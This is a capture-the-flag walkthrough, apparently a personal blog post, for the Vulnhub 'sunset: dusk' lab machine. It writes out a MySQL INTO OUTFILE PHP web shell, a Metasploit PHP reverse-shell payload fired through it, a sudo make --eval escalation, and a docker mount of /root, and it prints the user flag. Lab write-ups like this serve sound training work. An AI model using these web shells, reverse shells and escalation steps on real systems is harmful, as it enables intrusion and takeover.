sunset: dusk walkthrough

sunset dusk vulnhub ctf walkthrough

Introducing the In Sunset: dusk virtual machine, created by whitecr0wz and is available on Vulnhub

Description: sunset dusk walkthrough

Difficulty: Beginner

Download VM link

Network Scanning

Our First step is Network Scan and finds our target IP address I use Netdiscover Tool

netdiscover

After scan network, our next step is target machine IP Port Scan With Nmap

Nmap -A 192.168.1.18

target system many ports are open like 21,22,25,80,3306,8080

And port 8080 http service running with local tmp directory

After Enumerate port 3306 target machine use mysq_native_password

Now connect MySQL remote connection with password and user root

  • username: root
  • password: password
  • host: 192.168.1.18
mysql -u root -p -h 192.168.1.18

After login target MySQL server I am creating a PHP cmd shell with outfile option

select ("<?php system($_GET['cmd']);?>") into outfile '/var/tmp/cmd.php';

I am generating a simple web_delivery PHP reverse shell payload with Metasploit

  • msfconsole
  • use exploit/multi/script/web_delivery
  • set target 1 (for php reverse shell)
  • set payload php/meterpreter/reverse_tcp
  • set lhost eth0 (for ethernet card)
  • set lport 1122
  • run

we can see our payload target system /var/tmp/cmd.php directory Now execute our payload

http://192.168.1.18:8080/cmd.php?cmd=(our payload name )

As you can see, we are successful in getting our session

Now to get a proper shell session of shell type the following command import python

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now Find our first Flag user.txt

  • cd /home/dusk
  • ls
  • cat user.txt
  • 08ebacf8f4e43f05b8b8b372df24235b

Privilege Escalation

Now see user dusk sudoers file Enter with NOPASSWD: /usr/bin/ping, /usr/bin/make. /usr/bin/sl After searching google I find an exploit make command now exploit user dusk

sudo -l
shell=/bin/sh
sudo -u dusk make -s --eval=$'x:\n\t-'"$shell"

After executing our exploit my shell is change www-data to user dusk

I am run ID command and I see user dusk docker group member

What is docker

Docker was introduced to meet all the drawbacks of VMware. Docker has developed the concept of containers, it means whichever application you want to run in a virtual environment, the docker will create a container with the application and it’s every dependency.

I am Pull Image ubuntu in docker

I am run ubuntu image with docker and mount a system root partition into a docker image ubuntu and finally, we got a final root flag

docker run -it -v /root:/root ubuntu
cd /root
ls
cat root.txt

Author: Rahul Gehlaut

Sunset sunrise walkthrough here

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →